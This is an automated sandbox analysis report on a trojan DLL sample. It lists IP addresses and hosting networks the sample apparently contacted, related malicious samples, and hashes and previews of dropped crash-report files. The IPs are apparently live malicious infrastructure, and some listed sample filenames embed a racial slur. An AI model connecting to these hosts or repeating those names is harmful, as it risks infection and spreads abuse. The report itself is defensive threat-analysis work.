81.0.236.90	unknown	Czech Republic	15685	CASABLANCA-ASInternetCollocationProviderCZ	true
45.118.115.99	unknown	Indonesia	131717	IDNIC-CIFO-AS-IDPTCitraJelajahInformatikaID	true
103.75.201.2	unknown	Thailand	133496	CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTH	true
216.158.226.206	unknown	United States	19318	IS-AS-1US	true
107.182.225.142	unknown	United States	32780	HOSTINGSERVICES-INCUS	true
45.118.135.203	unknown	Japan	63949	LINODE-APLinodeLLCUS	true
50.116.54.215	unknown	United States	63949	LINODE-APLinodeLLCUS	true
51.68.175.8	unknown	France	16276	OVHFR	true
103.8.26.102	unknown	Malaysia	132241	SKSATECH1-MYSKSATECHNOLOGYSDNBHDMY	true
46.55.222.11	unknown	Bulgaria	34841	BALCHIKNETBG	true
41.76.108.46	unknown	South Africa	327979	DIAMATRIXZA	true
103.8.26.103	unknown	Malaysia	132241	SKSATECH1-MYSKSATECHNOLOGYSDNBHDMY	true
178.79.147.66	unknown	United Kingdom	63949	LINODE-APLinodeLLCUS	true
212.237.5.209	unknown	Italy	31034	ARUBA-ASNIT	true
176.104.106.96	unknown	Serbia	198371	NINETRS	true
207.38.84.195	unknown	United States	30083	AS-30083-GO-DADDY-COM-LLCUS	true
212.237.56.116	unknown	Italy	31034	ARUBA-ASNIT	true
45.142.114.231	unknown	Germany	44066	DE-FIRSTCOLOwwwfirst-colonetDE	true
203.114.109.124	unknown	Thailand	131293	TOT-LLI-AS-APTOTPublicCompanyLimitedTH	true
210.57.217.132	unknown	Indonesia	38142	UNAIR-AS-IDUniversitasAirlanggaID	true
58.227.42.236	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	true
185.184.25.237	unknown	Turkey	209711	MUVHOSTTR	true
158.69.222.101	unknown	Canada	16276	OVHFR	true
104.251.214.46	unknown	United States	54540	INCERO-HVVCUS	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	532264
Start date:	01.12.2021
Start time:	22:40:12
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 57s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	TYLNb8VvnmYA.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	32
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal84.troj.evad.winDLL@43/16@0/29
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 37.9% (good quality ratio 35.6%) Quality average: 72.3% Quality standard deviation: 26.6%
HCA Information:	Successful, ratio: 72% Number of executed functions: 34 Number of non-executed functions: 81
Cookbook Comments:	Adjust boot time Enable AMSI Sleeps bigger than 120000ms are automatically reduced to 1000ms Found application associated with file extension: .dll
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe Excluded IPs from analysis (whitelisted): 23.211.6.115, 52.168.117.173, 80.67.82.211, 80.67.82.235 Excluded domains from analysis (whitelisted): e12564.dspb.akamaiedge.net, onedsblobprdeus16.eastus.cloudapp.azure.com, client.wns.windows.com, login.live.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, a1449.dscg2.akamai.net, arc.msn.com Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
22:43:10	API Interceptor	1x Sleep call for process: MpCmdRun.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
195.154.133.20	snBYiBAMB2.dll	Get hash	malicious	Browse
	6zAcNlJXo7.dll	Get hash	malicious	Browse
	6zAcNlJXo7.dll	Get hash	malicious	Browse
	mal.dll	Get hash	malicious	Browse
	mal2.dll	Get hash	malicious	Browse
	mal.dll	Get hash	malicious	Browse
	mal2.dll	Get hash	malicious	Browse
	2gyA5uNl6VPQUA.dll	Get hash	malicious	Browse
	2gyA5uNl6VPQUA.dll	Get hash	malicious	Browse
	9sQccNfqAR.dll	Get hash	malicious	Browse
	FILE_464863409880121918.xlsm	Get hash	malicious	Browse
	9sQccNfqAR.dll	Get hash	malicious	Browse
	t3XtgyQEoe.dll	Get hash	malicious	Browse
	t3XtgyQEoe.dll	Get hash	malicious	Browse
	SCAN_35292280954166786.xlsm	Get hash	malicious	Browse
	U4pi8WRxNJ.dll	Get hash	malicious	Browse
	oERkAQeB4d.dll	Get hash	malicious	Browse
	FC9fpZrma1.dll	Get hash	malicious	Browse
	Z4HpRSQD6I.dll	Get hash	malicious	Browse
212.237.17.99	TYLNb8VvnmYA.dll	Get hash	malicious	Browse
	snBYiBAMB2.dll	Get hash	malicious	Browse
	6zAcNlJXo7.dll	Get hash	malicious	Browse
	6zAcNlJXo7.dll	Get hash	malicious	Browse
	mal.dll	Get hash	malicious	Browse
	mal2.dll	Get hash	malicious	Browse
	mal.dll	Get hash	malicious	Browse
	mal2.dll	Get hash	malicious	Browse
	2gyA5uNl6VPQUA.dll	Get hash	malicious	Browse
	2gyA5uNl6VPQUA.dll	Get hash	malicious	Browse
	9sQccNfqAR.dll	Get hash	malicious	Browse
	FILE_464863409880121918.xlsm	Get hash	malicious	Browse
	9sQccNfqAR.dll	Get hash	malicious	Browse
	t3XtgyQEoe.dll	Get hash	malicious	Browse
	t3XtgyQEoe.dll	Get hash	malicious	Browse
	SCAN_35292280954166786.xlsm	Get hash	malicious	Browse
	U4pi8WRxNJ.dll	Get hash	malicious	Browse
	oERkAQeB4d.dll	Get hash	malicious	Browse
	FC9fpZrma1.dll	Get hash	malicious	Browse
	Z4HpRSQD6I.dll	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ARUBA-ASNIT	TYLNb8VvnmYA.dll	Get hash	malicious	Browse	212.237.56.116
	snBYiBAMB2.dll	Get hash	malicious	Browse	212.237.56.116
	6zAcNlJXo7.dll	Get hash	malicious	Browse	212.237.56.116
	6zAcNlJXo7.dll	Get hash	malicious	Browse	212.237.56.116
	DHL DOCUMENT FOR #504.exe	Get hash	malicious	Browse	62.149.128.40
	RqgAGRvHNwhoreniggagay.dll	Get hash	malicious	Browse	94.177.217.88
	RqgAGRvHNwhoreniggagay.dll	Get hash	malicious	Browse	94.177.217.88
	dFUOuTxFQrXAwhoreniggagay.dll	Get hash	malicious	Browse	94.177.217.88
	RbrKCqqjDPUwhoreniggagay.dll	Get hash	malicious	Browse	94.177.217.88
	dFUOuTxFQrXAwhoreniggagay.dll	Get hash	malicious	Browse	94.177.217.88
	RbrKCqqjDPUwhoreniggagay.dll	Get hash	malicious	Browse	94.177.217.88
	mal.dll	Get hash	malicious	Browse	212.237.56.116
	mal2.dll	Get hash	malicious	Browse	212.237.56.116
	mal.dll	Get hash	malicious	Browse	212.237.56.116
	GYRxsMXKtvwSwhoreniggagay.dll	Get hash	malicious	Browse	94.177.217.88
	KsXtuXmxoZvgudVwhoreniggagay.dll	Get hash	malicious	Browse	94.177.217.88
	xTpcaEZvwmHqwhoreniggagay.dll	Get hash	malicious	Browse	94.177.217.88
	mal2.dll	Get hash	malicious	Browse	212.237.56.116
	GYRxsMXKtvwSwhoreniggagay.dll	Get hash	malicious	Browse	94.177.217.88
	KsXtuXmxoZvgudVwhoreniggagay.dll	Get hash	malicious	Browse	94.177.217.88
RACKCORP-APRackCorpAU	TYLNb8VvnmYA.dll	Get hash	malicious	Browse	110.232.117.186
	snBYiBAMB2.dll	Get hash	malicious	Browse	110.232.117.186
	6zAcNlJXo7.dll	Get hash	malicious	Browse	110.232.117.186
	6zAcNlJXo7.dll	Get hash	malicious	Browse	110.232.117.186
	mal.dll	Get hash	malicious	Browse	110.232.117.186
	mal2.dll	Get hash	malicious	Browse	110.232.117.186
	mal.dll	Get hash	malicious	Browse	110.232.117.186
	mal2.dll	Get hash	malicious	Browse	110.232.117.186
	2gyA5uNl6VPQUA.dll	Get hash	malicious	Browse	110.232.117.186
	2gyA5uNl6VPQUA.dll	Get hash	malicious	Browse	110.232.117.186
	9sQccNfqAR.dll	Get hash	malicious	Browse	110.232.117.186
	FILE_464863409880121918.xlsm	Get hash	malicious	Browse	110.232.117.186
	9sQccNfqAR.dll	Get hash	malicious	Browse	110.232.117.186
	t3XtgyQEoe.dll	Get hash	malicious	Browse	110.232.117.186
	t3XtgyQEoe.dll	Get hash	malicious	Browse	110.232.117.186
	SCAN_35292280954166786.xlsm	Get hash	malicious	Browse	110.232.117.186
	U4pi8WRxNJ.dll	Get hash	malicious	Browse	110.232.117.186
	oERkAQeB4d.dll	Get hash	malicious	Browse	110.232.117.186
	FC9fpZrma1.dll	Get hash	malicious	Browse	110.232.117.186
	Z4HpRSQD6I.dll	Get hash	malicious	Browse	110.232.117.186
OnlineSASFR	TYLNb8VvnmYA.dll	Get hash	malicious	Browse	195.154.133.20
	snBYiBAMB2.dll	Get hash	malicious	Browse	195.154.133.20
	6zAcNlJXo7.dll	Get hash	malicious	Browse	195.154.133.20
	6zAcNlJXo7.dll	Get hash	malicious	Browse	195.154.133.20
	mal.dll	Get hash	malicious	Browse	195.154.133.20
	mal2.dll	Get hash	malicious	Browse	195.154.133.20
	mal.dll	Get hash	malicious	Browse	195.154.133.20
	mal2.dll	Get hash	malicious	Browse	195.154.133.20
	2gyA5uNl6VPQUA.dll	Get hash	malicious	Browse	195.154.133.20
	2gyA5uNl6VPQUA.dll	Get hash	malicious	Browse	195.154.133.20
	spZRMihlrkFGqYq1f.dll	Get hash	malicious	Browse	195.154.146.35
	spZRMihlrkFGqYq1f.dll	Get hash	malicious	Browse	195.154.146.35
	AtlanticareINV25-67431254.htm	Get hash	malicious	Browse	51.15.17.195
	9sQccNfqAR.dll	Get hash	malicious	Browse	195.154.133.20
	FILE_464863409880121918.xlsm	Get hash	malicious	Browse	195.154.133.20
	9sQccNfqAR.dll	Get hash	malicious	Browse	195.154.133.20
	t3XtgyQEoe.dll	Get hash	malicious	Browse	195.154.133.20
	t3XtgyQEoe.dll	Get hash	malicious	Browse	195.154.133.20
	67MPsax8fd.exe	Get hash	malicious	Browse	163.172.208.8
	Linux_x86	Get hash	malicious	Browse	212.83.174.79

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_8c5962cbbdb13a8671f1f3c3793157e73bd5d897_d70d8aa6_1a5fcb12\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.6755800859689198
Encrypted:	false
SSDEEP:	96:VxCEPjZqyNy9hkoyt7JfapXIQcQ5c6A2cE2cw33+a+z+HbHgAVG4rmMOyWZAXGnD:R9BMHnM28jj0q/u7sES274ItW
MD5:	FC1E6BBF064002B185093E97A89FEB0F
SHA1:	FFACD8D43A3B1FD5834E9BB4FB4BAC48A176B49E
SHA-256:	63E485D105F112B116B9FB47235E53B0D6376B04342D2AB28A4F8F426DA4A54F
SHA-512:	4E4AA10ADFC8B8E3F66AA5C01BC423C8F4B53F81F2AE76D4C4B61BDDA8A8A69CA297CCB6323DD1486096C0AEF33B1B8E2B144E54362675454C3CFAAACAC16296
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.2.9.0.0.9.9.7.6.4.3.9.3.7.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.3.a.9.1.5.c.6.-.2.e.b.9.-.4.6.1.d.-.a.3.0.6.-.1.9.3.0.9.b.8.e.5.d.f.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.3.0.5.f.c.d.e.-.f.1.3.b.-.4.5.3.4.-.a.6.9.a.-.6.a.e.5.b.4.e.2.4.6.7.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.b.0.-.0.0.0.1.-.0.0.1.c.-.5.9.1.b.-.2.4.9.4.4.7.e.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.0.9././.2.8.:.1.1.:.5.3.:.0.5.!.0.!.l.o.a.d.d.l.l.3.2...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_d71d33d652a62c864cb684e881f783bcee8c2df7_d70d8aa6_170bfc05\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.6793727217357383
Encrypted:	false
SSDEEP:	96:OvF0IPjZqyOy9hk1Dg3fWpXIQcQ4c6ZcEicw3t+a+z+HbHgAVG4rmMOyWZAXGngC:s+A9BWHWd4Rj0q/u7sJS274ItW
MD5:	3A91ED7DB80E2A50F337747C63E92044
SHA1:	3DB3D584FC42282ACE58A5FD2B6383E4BDE4473B
SHA-256:	99FDD8B6BAA4137528E8DA0B317C653F67914ED4997B83EB5795D31150453C8D
SHA-512:	7B5235ACF65B9AB58317001E357E2DCA811007A9CBA56F5C2F5C570AEE3248126B1964D76BD968E8BD43A23DE8BFA10ECA65CCAC85A3BCE1177ABF28C81136BF
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.2.9.0.1.0.0.7.9.1.7.5.6.6.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.2.9.0.1.0.1.2.3.2.3.7.7.6.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.6.5.f.c.b.d.b.-.f.7.5.b.-.4.8.3.1.-.a.7.6.3.-.a.d.8.d.b.a.5.2.9.7.e.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.e.0.5.0.5.0.b.-.1.1.9.8.-.4.a.f.9.-.8.1.8.6.-.6.3.0.e.7.d.9.1.2.c.7.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.b.0.-.0.0.0.1.-.0.0.1.c.-.5.9.1.b.-.2.4.9.4.4.7.e.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2699.tmp.csv Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	49014
Entropy (8bit):	3.052981209253508
Encrypted:	false
SSDEEP:	768:JnHfEsR4EtAmDky6ZyuAng0ska50ruB2sp7vH4DZdPC5HpvJUZMsimWYnzCKY6:JnHftAXy6ZyuAng0ska5Km2sprYDZdPb
MD5:	C8CD55BBE6C4E459BDC838F197DE35B0
SHA1:	68368C6EB2B79FDD633D566F2486B9EB94AF55FB
SHA-256:	170D063E2726B28C161BE0F834CE35EFA5821A5E2720B6B900ADEDDA04A1A797
SHA-512:	48950F0BC52755355F45A27610D448B41DB52A12F7EE116D609D79CE7DF27E7D1A406AC4C34B719669B9FA21EACFE4DC772448DDD9BEFB9AD7F224F6FD5DAC34
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2A53.tmp.txt Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6956155049611303
Encrypted:	false
SSDEEP:	96:9GiZYWSQcWpYxYtWhJ7HkUYEZ1EtFiYO745wSU8safUohuvsIjS3:9jZDfGbzoUdafUohuvrjS3
MD5:	612F47EB9D24FD4E61DDEC29F295FDB0
SHA1:	EAAF045CE1E96207ED97A4B6BEFAE022A5E3E72F
SHA-256:	B33577DB2BA85360CCE16F3AB1350811F0C34BC7BBD413DCFCB3FEB51B0902B3
SHA-512:	6D15F4EFBD0F3DC9C27C1E164EF26DE0A1B1D3B6DD7FC73399BC7077EA38124778FA83F9710C06B085779049824841B63D407FA41A41969F2D1F9F98F6591041
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBD95.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Dec 2 06:43:18 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	26648
Entropy (8bit):	2.4940782672108894
Encrypted:	false
SSDEEP:	192:04YVB6OZq+p/V/54qDgybpOKv6zFdlcwoAY8K:SBFZq+/V3DBOKv6zFdW3F
MD5:	C8B2D2828CD8CAF6D8C251B3CDA0580A
SHA1:	4A167C9CFCC527998A72BDD884BB8C4C86B7E312
SHA-256:	DDCDA1AD68395279378CF48738DAF2C3C9BA7AC8C170FA4753BE026E7A7C3AA4
SHA-512:	2577F32C4B88202897DBB2E5897F2600B69C00BAEBD352E7CE1919B327805EABD1F3FFB144333363116222E9F649ED7C30A5C08BABFA9BCC471D5EB8A39D55B1
Malicious:	false
Preview:	MDMP....... ........k.a............4...............H.......$...........................`.......8...........T...........h....[...........................................................................................U...........B......p.......GenuineIntelW...........T............j.a+............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC21A.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8342
Entropy (8bit):	3.7013732607536407
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNi356GBXF6YFcnSU4nogmfsSzjCpBc89bTcsfVxm:RrlsNiJ6K6Y8SU4ogmfsSzQTvf6
MD5:	57C5752D6E1511D0F91470D87254D736
SHA1:	1113698518A90728FB2D9BEDCFE6653C2DB1C3C8
SHA-256:	C48BC6E8CF9B7615CDC9F042485275E3CE858D0E5C47FCC954D10BCDA7B7CA7B
SHA-512:	00DE8147AB90567E402CC3B35CFDFEFEBDE678A8C923C8ABA0933C1103C7BFA1F058AF40245AA8706FF3B4799D13E39F37CADEC04B292098E296609AA3B6CB05
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.8.0.8.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC567.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4598
Entropy (8bit):	4.477802543006523
Encrypted:	false
SSDEEP:	48:cvIwSD8zsXJgtWI97ZVWSC8Bbs8fm8M4J2yzZF93N+q84Wv4KcQIcQwQjd:uITf5EqSN7JJZdg4KkwQjd
MD5:	B739F4FD9D0B752A1E071F45EBADDF66
SHA1:	4EF87B8B0EE996EBBE5487882D88A5C86C79C5B0
SHA-256:	83483881D268A949AA0E1A03931505E2180483C4BF082AB4850263FCE07CCE92
SHA-512:	CFCDA3D257DE0C283127C46DF72638399D5C89A9E63EAA4B063B268D82224FA758D0C70C39CE0C4405E65A200446C2731E52FFA4845E1A470040C74B06A7ED12
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1279673" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE5BE.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Dec 2 06:43:28 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	1059644
Entropy (8bit):	1.3646955547718411
Encrypted:	false
SSDEEP:	1536:6Z33b+rjyQ5SO2rdQrn7YaDf9/7DhvHqZL/t6xqzCSFPBwf49nNwr:6BkjyQsQr7xxmt6xquSFPBI49nNwr
MD5:	3FA64B42A2B811103CC6E48B6B1AE88B
SHA1:	0AAEA0C7B37591220CA46EF80886AA55A91FF40A
SHA-256:	47571B1F5B94D863716BE43CAE1AA4F1E495585F7D731B05FB157AD04CE14B00
SHA-512:	A9F71C659C636B1C62AC4B92F5479DD4834D87E69DD43A1DEDA80961C2F8765718A4C6776EDD1C387C20F13A4ABD1F849DA8DF1BC6A2F784F89AEBE87B740B2E
Malicious:	false
Preview:	MDMP....... ........k.a............4...............H.......$...........................`.......8...........T...........@................................................................................................U...........B......p.......GenuineIntelW...........T............j.a+............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREDFD.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8302
Entropy (8bit):	3.6940809432997725
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNi3D6To6YFASUEPYgmfL8GSyCpDH89bwcsflwm:RrlsNiT686YiSUEQgmfLrSawvfX
